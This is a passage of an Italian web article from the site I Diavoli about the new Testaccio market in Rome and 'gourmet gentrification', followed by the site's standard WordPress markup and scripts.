<p>Il trasloco ha sollevato polemiche e scetticismo. Oggi però la piazza è ariosa, apprezzata dai testaccini, vissuta quasi quanto la storica piazza della socialità del quartiere, S. Maria Liberatrice. In questo domino, al centro di piazza Testaccio è stata spostata dal lungotevere la fontana delle Anfore. La stessa fontana che ottant&#8217;anni prima aveva fatto il tragitto opposto, per lasciare spazio al vecchio mercato.</p>
<p>Nello stesso 2012 la zona limitrofa di Ostiense, che condivide con Testaccio uno dei rari pregressi industriali della città, era sede dell&#8217;inaugurazione del primo Eataly di Roma. E a meno di un chilometro da lì, c&#8217;era e c&#8217;è ancora un cantiere aperto, un ventre spalancato: è l&#8217;area degli ex Mercati Generali, il maggiore centro all&#8217;ingrosso per rifornire i commercianti al dettaglio, dismesso nel 2004.</p>
<blockquote><p>
Da fuori il nuovo mercato sembra un alveare, per le traforature dei pannelli e per le frequenti aperture all&#8217;esterno. Affaccia sui padiglioni dell&#8217;ex Mattatoio, la chiusura del quale negli anni Settanta originò la gentrification di Testaccio, come <a href="http://www.aracneeditrice.it/index.php/pubblicazione.html?item=9788854875166">ha osservato</a> Irene Ranaldi.<br />
Da dentro è troppo pulito per restituire l&#8217;idea di un mercato. Un centinaio di ampi box, il colore bianco che prevale ovunque. Si ha piuttosto l&#8217;impressione di camminare in un centro commerciale.
</p></blockquote>
<p>Nonostante il rigore del progetto architettonico, con la struttura che si rifà alla forma del quartiere e alcune finezze nella scelta dei materiali, l&#8217;offerta del mercato mette insieme concetti in contraddizione (“Format differenti” li chiama il <a href="http://www.gamberorosso.it/it/food/1022247-6-banchi-che-stanno-trasformando-il-mercato-testaccio-a-roma">Gambero Rosso</a>). Si ostenta la romanità ma si vendono prodotti caseari dell&#8217;appennino campano ed eccellenze della tradizione siciliana. Un commerciante del mercato <a href="http://www.gamberorosso.it/it/food/1022247-6-banchi-che-stanno-trasformando-il-mercato-testaccio-a-roma">spiegava</a> tempo fa: “La romanità del mercato con i suoi rumori, profumi e clienti deve esserci, ma va integrata con il nuovo concetto di gastromarket”.</p>
<p>È difficile quantificare e dimostrare quanto il mercato stia escludendo i vecchi clienti, cioè la comunità locale. Così com&#8217;è difficile capire, a oggi, se i prezzi delle case e degli esercizi commerciali saranno spinti in alto dalla nuova struttura. Non sono d&#8217;aiuto i dati del mercato immobiliare, che a Roma è crollato in modo generalizzato sul finire degli anni Zero e non si è ancora tirato su. Di certo l&#8217;esclusione va insieme al concetto di esclusività, con cui il mercato rionale del Duemila si sta distinguendo. E se a firmare gli spuntini <a href="http://roma.repubblica.it/cronaca/2016/03/19/news/roma_mangiare_al_mercato-135849139/">è</a> Cristina Bowerman, chef stellata, allora la narrazione dello street-food parla davvero poco di strada.</p>

		</div>
	</div>
</div></div></div></div>
</div>
<div class="col-md-4 col-art-dx">
<div class="stickypost">

<div style='width:auto;' id="relatedpostspro_0_1"
     class='rpp rpp_isotope'>
<div class='rpp_container'>


    <legend>Ti può interessare anche:</legend>


<div class='rpp_buttons rpp_hidden'>

    
    <fieldset class='rpp_filters rpp_hidden'>
        <legend>Filter by</legend>
        <!--
        <button class='rpp_numbers rpp_toggle'>Type</button>
        <div class='rpp_number_container'>
           <span data-filter-value='number' amount=0 class='rpp_number rpp_active'>All</span>
           <span data-filter-value='number' amount=5 class='rpp_number rpp_active'>5</span>
           <span data-filter-value='number' amount=10 class='rpp_number rpp_active'>10</span>
           <span data-filter-value='number' amount=15 class='rpp_number rpp_active'>15</span>
        </div>
        -->
        <button
            class='rpp_posttype rpp_toggle rpp_hidden'>
                            <span class="cption">
                                Post type                            </span>
        </button>
        <div class='rpp_posttype_container'>

            
            
            <span data-filter-value='post_type' post_type='post' class='rpp_posttype rpp_active'>Post</span>
            <span data-filter-value='post_type' post_type='page' class='rpp_posttype rpp_active'>Page</span>

            <div class='rpp_arrow'></div>
        </div>
        <button
            class='rpp_categories rpp_toggle'>
                            <span class="cption">
                                Category                            </span>
        </button>
        <div class='rpp_cat_container'>
                                            <span data-filter-value='category' catid=105                class='rpp_cat rpp_active '>Focus</span>
                                                                                                                                                                                                                    <div class='rpp_arrow'></div>
        </div>

    </fieldset>
    <fieldset class='rpp_sorters'>
        <legend>Sort by</legend>
        <button data-sort-value="rpp_title"
                class='rpp_title'>
                            <span class="cption">
                                Title                            </span>

                            <span class='rpp_sort_inner'>
                              <span class='rpp_sort_arrow'>
                                 <?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="100px" height="100px" viewBox="0 0 100 100" enable-background="new 0 0 100 100" xml:space="preserve">
<path d="M50,71.276c-1.338,0-2.676-0.511-3.696-1.53l-32.099-32.1c-2.042-2.042-2.042-5.352,0-7.393
	c2.041-2.041,5.351-2.041,7.393,0L50,58.656l28.402-28.402c2.042-2.041,5.352-2.041,7.393,0c2.042,2.041,2.042,5.351,0,7.393
	l-32.099,32.1C52.676,70.766,51.338,71.276,50,71.276z"/>
</svg>
                              </span>
                            </span>
            
        </button>
        <button data-sort-value="rpp_relevance"
                class='rpp_relevance rpp_active'>
            <span class="cption">
               Relevance            </span>

                            <span class='rpp_sort_inner'>
                  <span class='rpp_sort_arrow'>
                     <?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="100px" height="100px" viewBox="0 0 100 100" enable-background="new 0 0 100 100" xml:space="preserve">
<path d="M50,71.276c-1.338,0-2.676-0.511-3.696-1.53l-32.099-32.1c-2.042-2.042-2.042-5.352,0-7.393
	c2.041-2.041,5.351-2.041,7.393,0L50,58.656l28.402-28.402c2.042-2.041,5.352-2.041,7.393,0c2.042,2.041,2.042,5.351,0,7.393
	l-32.099,32.1C52.676,70.766,51.338,71.276,50,71.276z"/>
</svg>
                  </span>
                </span>
            
        </button>
    </fieldset>

    
</div>


    
    <div class='rpp_search' style='display:none;'>
        <div class='svg_container'>
            <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"

	 width="512px" height="512px" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve">

<path id="magnifier-7-icon" d="M460.475,408.443L351.4,299.37c15.95-25.137,25.2-54.923,25.2-86.833

	C376.601,122.914,303.687,50,214.062,50c-89.623,0-162.537,72.914-162.537,162.537s72.914,162.537,162.537,162.537

	c30.325,0,58.732-8.356,83.055-22.876L406.918,462L460.475,408.443z M96.315,212.538c0-64.927,52.819-117.748,117.746-117.748

	c64.926,0,117.748,52.821,117.748,117.748c0,64.926-52.822,117.747-117.748,117.747C149.135,330.285,96.315,277.464,96.315,212.538z

	 M282.276,231.882H149.957v-36.86h132.319V231.882z"/>

</svg>        </div>
        <div class='input_container'>
            <input data-filter-value='search' data-sort-value="rpp_title"
                   type='text' placeholder='filter results'/>
        </div>
    </div>

    


<div class='rpp_wrapper'>
                    
        
        <div num=1 terms='105'
             post_type='post'
             class='rpp_item rpp_visible current'>

            
            <div class='rpp_inner'>

                                    <div class='rpp_img'>
                        <img src='http://www.idiavoli.com/wp-content/uploads/2018/02/breslavia-immaginecopertinaBW.jpg'/>

                        
                    </div>
                
                                    <p class='rpp_title'>
                        <a href='http://www.idiavoli.com/focus/gentrification-classista-breslavia/'>
                            Gentrification classista a Breslavia                                                            <span class="overlap"></span>
                                                    </a>
                    </p>
                
                                                    <div class="rpp_date">
                        2018-02-22 10:46:56                    </div>
                                                    <div class="rpp_author">
                        am                    </div>
                                <p class='rpp_relevance rpp_hidden'>18</p>
                <div class='rpp_last'></div>
            </div>

            
        </div>

        
                    
        
        <div num=2 terms='105'
             post_type='post'
             class='rpp_item rpp_visible'>

            
            <div class='rpp_inner'>

                                    <div class='rpp_img'>
                        <img src='http://www.idiavoli.com/wp-content/uploads/2017/12/bushwick_cover_gentrification_bn.jpg'/>

                        
                    </div>
                
                                    <p class='rpp_title'>
                        <a href='http://www.idiavoli.com/focus/gentrification-bushwich-ny-disuguaglianze/'>
                            NY, Bushwick. Gentrification che<br> porta disuguaglianza                                                            <span class="overlap"></span>
                                                    </a>
                    </p>
                
                                                    <div class="rpp_date">
                        2017-12-18 10:59:28                    </div>
                                                    <div class="rpp_author">
                        stella                    </div>
                                <p class='rpp_relevance rpp_hidden'>18</p>
                <div class='rpp_last'></div>
            </div>

            
        </div>

        
                    
        
        <div num=3 terms='105'
             post_type='post'
             class='rpp_item rpp_visible'>

            
            <div class='rpp_inner'>

                                    <div class='rpp_img'>
                        <img src='http://www.idiavoli.com/wp-content/uploads/2017/11/dublino-gent-immagine-cop-BW.jpg'/>

                        
                    </div>
                
                                    <p class='rpp_title'>
                        <a href='http://www.idiavoli.com/focus/back-90s-gentrification-dublino/'>
                            Back to 90&#8217;s: gentrification a Dublino                                                            <span class="overlap"></span>
                                                    </a>
                    </p>
                
                                                    <div class="rpp_date">
                        2017-11-30 14:08:33                    </div>
                                                    <div class="rpp_author">
                        am                    </div>
                                <p class='rpp_relevance rpp_hidden'>18</p>
                <div class='rpp_last'></div>
            </div>

            
        </div>

        
                </div>


    <nav>
                    </nav>

</div>
</div>
    </div>
</div>
<p class="clearfix">
<div class="share-articolo01"><span class="condividiarticolo">CONDIVIDI QUESTO ARTICOLO SU</span><!-- Simple Share Buttons Plus (v1.1.5) simplesharebuttons.com/plus  License Inactive --><div class="ssbp-set--one ssbp--state-hidden ssbp-wrap ssbp-- ssbp--theme-4" data-ssbp-responsive="true"><button class="ssbp-toggle-switch ssbp-toggle-close"><span></span></button><div class="ssbp-container" data-ssbp-share-text="" data-ssbp-url="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" data-ssbp-title="La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)" data-ssbp-short-url="" data-ssbp-post-id="7739"><ul class="ssbp-list"><li class="ssbp-li--facebook"><a href="http://www.facebook.com/sharer.php?u=http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" class="ssbp-btn ssbp-facebook ssbp-facebook--standard"  data-ssbp-title="La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)" data-ssbp-url="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" data-ssbp-site="Facebook" ><span class="ssbp-text">Facebook</span></a></li><li class="ssbp-li--twitter"><a href="https://twitter.com/share?url=http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/&amp;text=La+chiamavano+%E2%80%9CGourmet+gentrification%E2%80%9D+%28pt.1%29+&amp;hashtags=" class="ssbp-btn ssbp-twitter ssbp-twitter--standard" data-ssbp-title="La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)" data-ssbp-url="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" data-ssbp-site="Twitter" ><span class="ssbp-text">Twitter</span></a></li><li class="ssbp-li--google"><a href="https://plus.google.com/share?url=http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" class="ssbp-btn ssbp-google"  data-ssbp-title="La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)" data-ssbp-url="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" data-ssbp-site="Google+" ><span class="ssbp-text">Google+</span></a></li><li class="ssbp-li--linkedin"><a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" class="ssbp-btn ssbp-linkedin"  data-ssbp-title="La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)" data-ssbp-url="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" data-ssbp-site="LinkedIn" ><span class="ssbp-text">Linkedin</span></a></li></ul><div class="ssbp-input-url-div"><input class="ssbp-input-url" type="text" value="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" /></div></div></div></div>
<div class="autore-articolo">
<div class="row">
<div class="col-md-2 col-sm-3 col-xs-3">
  
  </div>
<div class="col-md-10 col-sm-9 col-xs-9">
<h3>La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)</h3>
<div></div>
</div></div></div></div>
 	</div>

  	<div class="navigation">
 		
 	</div>
  <!--fine loop-->
   </div>
 </div>
    
     </div>
   </div> <!--/corpo-->
   
 <div class="footer">
  <div class="container">
     <div class="row">
       <div class="col-md-4 col-sm-4">
         		 <div><h3>Menu</h3><div class="menu-menu-coda-01-container"><ul id="menu-menu-coda-01" class="menu"><li id="menu-item-2230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2230"><a href="http://www.idiavoli.com/il-progetto/">Il Progetto</a></li>
<li id="menu-item-1897" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1897"><a href="http://www.idiavoli.com/il-tredicesimo-piano-old/">Il Tredicesimo Piano</a></li>
<li id="menu-item-5155" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-5155"><a href="http://www.idiavoli.com/il-tredicesimo-piano/tredicesimo-piano-la-miniserie-web-air/">Miniserie web</a></li>
<li id="menu-item-5175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5175"><a href="http://www.idiavoli.com/video/">Video</a></li>
<li id="menu-item-5154" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5154"><a href="http://www.idiavoli.com/english-selection/">English Selection</a></li>
</ul></div></div><div><h3>I DIAVOLI</h3><div class="menu-menu-coda-02-container"><ul id="menu-menu-coda-02" class="menu"><li id="menu-item-5151" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5151"><a href="http://www.idiavoli.com/contatti/">Contatti</a></li>
<li id="menu-item-5152" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5152"><a href="http://www.idiavoli.com/newsletter/">Newsletter</a></li>
<li id="menu-item-5153" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5153"><a href="http://www.idiavoli.com/e-book/">E-book</a></li>
</ul></div></div>	            </div> <!--/col-md-4-->
         <div class="col-md-4 col-sm-4">
          		 <div><h3>Sezioni</h3><div class="menu-menu-rubriche-container"><ul id="menu-menu-rubriche" class="menu"><li id="menu-item-5148" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-5148"><a href="http://www.idiavoli.com/focus/">Focus</a></li>
<li id="menu-item-5147" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5147"><a href="http://www.idiavoli.com/ritratti/">Ritratti</a></li>
<li id="menu-item-5145" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5145"><a href="http://www.idiavoli.com/banche/">Banche</a></li>
<li id="menu-item-5149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5149"><a href="http://www.idiavoli.com/recensioni/">Recensioni</a></li>
<li id="menu-item-5150" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5150"><a href="http://www.idiavoli.com/interviste/">Interviste</a></li>
<li id="menu-item-5146" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5146"><a href="http://www.idiavoli.com/mailbox-riceviamo-e-pubblichiamo/">MAILBOX</a></li>
</ul></div></div>	            </div> <!--/col-md-4-->
       <div class="col-md-4 col-sm-4">
         		 <div><h3>Seguici</h3><div class="textwidget"><p><a href="https://www.facebook.com/idiavoliufficiale/?fref=ts" target="_blank"><img class="ico-coda alignnone wp-image-71 size-full" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-facebook-coda.jpg" alt="ico-facebook-coda" width="38" height="39" /></a>  <a href="https://twitter.com/i_diavoli" target="_blank"><img class="ico-coda alignnone wp-image-73 size-full" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-twitter-coda.jpg" alt="ico-twitter-coda" width="38" height="39" /></a>  <a href="https://www.youtube.com/user/idiavoliufficiale" target="_blank"><img class="ico-coda alignnone wp-image-74 size-full" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-youtube-coda.jpg" alt="ico-youtube-coda" width="38" height="39" /></a>  <a href="https://www.linkedin.com/company/10260653?trk=tyah&amp;trkInfo=clickedVertical%3Acompany%2CclickedEntityId%3A10260653%2Cidx%3A1-1-1%2CtarId%3A1460323769748%2Ctas%3Ai%20diavoli" target="_blank"><img class="ico-coda alignnone wp-image-72 size-full" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-linkedin-coda.jpg" alt="ico-linkedin-coda" width="37" height="39" /></a></p>
<p>&nbsp;</p>
</div></div><div><h3>Newsletter</h3>
                <div class='gf_browser_unknown gform_wrapper' id='gform_wrapper_1' ><a id='gf_1' class='gform_anchor' ></a><form method='post' enctype='multipart/form-data'  id='gform_1'  action='/focus/gourmet-gentrification-nuovi-mercati-rionali/#gf_1'>
                        <div class='gform_body'><ul id='gform_fields_1' class='gform_fields top_label form_sublabel_below description_below'><li id='field_1_1' class='gfield col-md-12 nolabel gfield_contains_required field_sublabel_below field_description_below' ><label class='gfield_label' for='input_1_1' >Email<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_email'>
                            <input name='input_1' id='input_1_1' type='email' value='' class='medium' tabindex='1'   placeholder='La tua email'/>
                        </div></li><li id='field_1_2' class='gfield col-md-12 nolegend field_sublabel_below field_description_below' ><label class='gfield_label'  >Autorizzo</label><div class='ginput_container ginput_container_checkbox'><ul class='gfield_checkbox' id='input_1_2'><li class='gchoice_1_2_1'>
								<input name='input_2.1' type='checkbox'  value='&lt;span class=&quot;autorizzo&quot;&gt;Autorizzo trattamento dati (D.Lgs.196/2003). Dichiaro di aver letto &lt;a href=&quot;http://www.idiavoli.com/privacy-policy/&quot; target=&quot;_blank&quot;&gt;l’Informativa sulla privacy.&lt;/a&gt;&lt;/span&gt;'  id='choice_1_2_1' tabindex='2'  />
								<label for='choice_1_2_1' id='label_1_2_1'><span class="autorizzo">Autorizzo trattamento dati (D.Lgs.196/2003). Dichiaro di aver letto <a href="http://www.idiavoli.com/privacy-policy/" target="_blank">l’Informativa sulla privacy.</a></span></label>
							</li></ul></div></li>
                            </ul></div>
        <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_1' class='gform_button button' value='Invia' tabindex='3' onclick='if(window["gf_submitting_1"]){return false;}  if( !jQuery("#gform_1")[0].checkValidity || jQuery("#gform_1")[0].checkValidity()){window["gf_submitting_1"]=true;}  ' /> 
            <input type='hidden' class='gform_hidden' name='is_submit_1' value='1' />
            <input type='hidden' class='gform_hidden' name='gform_submit' value='1' />
            
            <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' />
            <input type='hidden' class='gform_hidden' name='state_1' value='WyJbXSIsIjYwMzc4YTY4NzgxZTBlMjcxODUzOTg1MTliNDkwMTIzIl0=' />
            <input type='hidden' class='gform_hidden' name='gform_target_page_number_1' id='gform_target_page_number_1' value='0' />
            <input type='hidden' class='gform_hidden' name='gform_source_page_number_1' id='gform_source_page_number_1' value='1' />
            <input type='hidden' name='gform_field_values' value='' />
            
        </div>
                        </form>
                        </div><script type='text/javascript'> jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 1) {if(typeof Placeholders != 'undefined'){
                        Placeholders.enable();
                    }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [1, 1]) } ); </script></div>	            </div> <!--/col-md-4-->
     </div> <!--/row-->
   </div>
  </div> <!--/footer-->
  
   <div class="copyright">
            <div class="container">
                <div class="row">
                    <div class="mycopy">                     
                        		 <div><div class="textwidget"><p>Copyright 2017 - All Rights Reserved - I Diavoli srl  - P.Iva 14071931001 -<a href="http://www.idiavoli.com/privacy-policy/"> Privacy</a> - <a href="http://www.idiavoli.com/cookie/">Cookie</a> - <a href="http://www.idiavoli.com/note-legali/">Note legali</a></p>
</div></div>	                         </div>
                    <div class="gammadesign">                     
                        		 <div><div class="textwidget"></div></div>	                         </div>
                    
                    <div class="clear"></div>
    
                </div>
            </div> 
        </div><!--/copyright-->
  
  
</div><!--/wrapper-->
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <!-- Salvattore core JavaScript -->
    <script src="http://www.idiavoli.com/wp-content/themes/idiavoli/js/salvattore.js"></script>
<!-- Bootstrap core JavaScript -->
    <script src="http://www.idiavoli.com/wp-content/themes/idiavoli/js/bootstrap.min.js"></script>
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="http://www.idiavoli.com/wp-content/themes/idiavoli/js/ie10-viewport-bug-workaround.js"></script>
    <!--Start Cookie Script--> <script type="text/javascript" charset="UTF-8" src="http://chs03.cookie-script.com/s/df2d1abb98cb5c586661069d14ff63be.js"></script> <!--End Cookie Script-->
</body>
<script type="text/html" id="tmpl-wp-playlist-current-item">
	<# if ( data.image ) { #>
	<img src="{{ data.thumb.src }}" alt="" />
	<# } #>
	<div class="wp-playlist-caption">
		<span class="wp-playlist-item-meta wp-playlist-item-title">&#8220;{{ data.title }}&#8221;</span>
		<# if ( data.meta.album ) { #><span class="wp-playlist-item-meta wp-playlist-item-album">{{ data.meta.album }}</span><# } #>
		<# if ( data.meta.artist ) { #><span class="wp-playlist-item-meta wp-playlist-item-artist">{{ data.meta.artist }}</span><# } #>
	</div>
</script>
<script type="text/html" id="tmpl-wp-playlist-item">
	<div class="wp-playlist-item">
		<a class="wp-playlist-caption" href="{{ data.src }}">
			{{ data.index ? ( data.index + '. ' ) : '' }}
			<# if ( data.caption ) { #>
				{{ data.caption }}
			<# } else { #>
				<span class="wp-playlist-item-title">&#8220;{{{ data.title }}}&#8221;</span>
				<# if ( data.artists && data.meta.artist ) { #>
				<span class="wp-playlist-item-artist"> &mdash; {{ data.meta.artist }}</span>
				<# } #>
			<# } #>
		</a>
		<# if ( data.meta.length_formatted ) { #>
		<div class="wp-playlist-item-length">{{ data.meta.length_formatted }}</div>
		<# } #>
	</div>
</script>
<div id="ssbp-email-div"><span class="ssbp-x ssbp-close-email-div"></span><div class="ssbp-email-alert" id="ssbp-email-alert"></div><input type="hidden" id="_wpnonce" name="_wpnonce" value="6a50479ec3" /><input type="hidden" name="_wp_http_referer" value="/focus/gourmet-gentrification-nuovi-mercati-rionali/" /><form id="js-ssbp-email-form" method="post" action=""
                data-success-alert-text="Thanks, your email has been sent"
                data-warning-alert-text="Please check the fields and try again"
                data-brute-alert-text="The email to friend functionality is restricted to one email every five minutes, please try again soon">
                <input type="hidden" id="fill_me" name="fill_me" value="" />
                <input type="hidden" id="url" name="url" value="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" /><input type="hidden" id="_wpnonce" name="_wpnonce" value="6a50479ec3" /><input type="hidden" name="_wp_http_referer" value="/focus/gourmet-gentrification-nuovi-mercati-rionali/" />
                <div class="ssbp-form-group">
                    <label for="email" class="ssbp-required">Friend's email</label>
                    <input type="email" class="ssbp-form-control ssbp-required" id="email" name="email" placeholder="friends@email.com" required>
                </div>
                <div class="ssbp-form-group">
                    <label for="message" class="ssbp-required">Message</label>
                    <textarea maxlength="250" class="ssbp-form-control ssbp-required" rows="6" id="message" name="message" required> http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/</textarea>
                </div>
                <div class="ssbp-form-group ssbp-text-align-right">
                    <button id="ssbp-email-send" type="submit" class="ssbp-btn-primary">Send</button>
                </div>
             </form><a href="https://simplesharebuttons.com/plus/?utm_source=plus&amp;utm_medium=plugin_powered_by&utm_campaign=powered_by&amp;utm_content=plus_email" target="_blank"><img class="ssbp-email-powered-by" src="http://www.idiavoli.com/wp-content/plugins/simple-share-buttons-plus/images/simple-share-buttons-logo-white.png" alt="Simple Share Buttons" /></a></div><div id="wonderpluginlightbox_options" data-skinsfoldername="skins/default/"  data-jsfolder="http://www.idiavoli.com/wp-content/plugins/wonderplugin-lightbox/engine/" data-autoslide="false" data-slideinterval="5000" data-showtimer="true" data-timerposition="bottom" data-timerheight="2" data-timercolor="#dc572e" data-timeropacity="1" data-showplaybutton="true" data-alwaysshownavarrows="false" data-bordersize="8" data-showtitleprefix="true" data-responsive="true" data-fullscreenmode="false" data-closeonoverlay="true" data-videohidecontrols="false" data-titlestyle="bottom" data-imagepercentage="75" data-enabletouchswipe="true" data-autoplay="true" data-html5player="true" data-overlaybgcolor="#000" data-overlayopacity="0.8" data-defaultvideovolume="1" data-bgcolor="#FFF" data-borderradius="0" data-thumbwidth="96" data-thumbheight="72" data-thumbtopmargin="12" data-thumbbottommargin="12" data-barheight="64" data-showtitle="true" data-titleprefix="%NUM / %TOTAL" data-titlebottomcss="color:#333; font-size:14px; font-family:Armata,sans-serif,Arial; overflow:hidden; text-align:left;" data-showdescription="true" data-descriptionbottomcss="color:#333; font-size:12px; font-family:Arial,Helvetica,sans-serif; overflow:hidden; text-align:left; margin:4px 0px 0px; padding: 0px;" data-titleinsidecss="color:#fff; font-size:16px; font-family:Arial,Helvetica,sans-serif; overflow:hidden; text-align:left;" data-descriptioninsidecss="color:#fff; font-size:12px; font-family:Arial,Helvetica,sans-serif; overflow:hidden; text-align:left; margin:4px 0px 0px; padding: 0px;" data-videobgcolor="#000" data-html5videoposter="" data-responsivebarheight="false" data-smallscreenheight="415" data-barheightonsmallheight="64" data-notkeepratioonsmallheight="false" style="display:none;"></div><script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/simple-share-buttons-plus/js/ssbp_standard.min.js?ver=4.4.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ssbpEmail = {"ajax_url":"http:\/\/www.idiavoli.com\/wp-admin\/admin-ajax.php","security":"0d75ba9f4c"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/simple-share-buttons-plus/js/ssbp_email.min.js?ver=4.4.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sticky_anything_engage = {"element":".stickypost","topspace":"0","minscreenwidth":"0","maxscreenwidth":"999999","zindex":"1","legacymode":"","dynamicmode":"","debugmode":"","pushup":".share-articolo01","adminbar":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/stickThis.js?ver=2.0.1'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/wp-views/embedded/res/js/i18n/jquery.ui.datepicker-it.js?ver=1.12.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mejsL10n = {"language":"it-IT","strings":{"Close":"Chiudi","Fullscreen":"Schermo intero","Download File":"Scarica il file","Download Video":"Scarica il video","Play\/Pause":"Esegui\/Pausa","Mute Toggle":"Cambia il mute","None":"Nessuna","Turn off Fullscreen":"Disattiva lo schermo intero","Go Fullscreen":"Vai a tutto schermo","Unmute":"Togli il mute","Mute":"Muto","Captions\/Subtitles":"Didascalie\/Sottotitoli"}};
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
var mejsL10n = {"language":"it-IT","strings":{"Close":"Chiudi","Fullscreen":"Schermo intero","Download File":"Scarica il file","Download Video":"Scarica il video","Play\/Pause":"Esegui\/Pausa","Mute Toggle":"Cambia il mute","None":"Nessuna","Turn off Fullscreen":"Disattiva lo schermo intero","Go Fullscreen":"Vai a tutto schermo","Unmute":"Togli il mute","Mute":"Muto","Captions\/Subtitles":"Didascalie\/Sottotitoli"}};
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=2.18.1-a'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/mediaelement/wp-mediaelement.js?ver=4.4.15'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/underscore.min.js?ver=1.6.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/wp-util.min.js?ver=4.4.15'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/backbone.min.js?ver=1.1.2'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/mediaelement/wp-playlist.js?ver=4.4.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
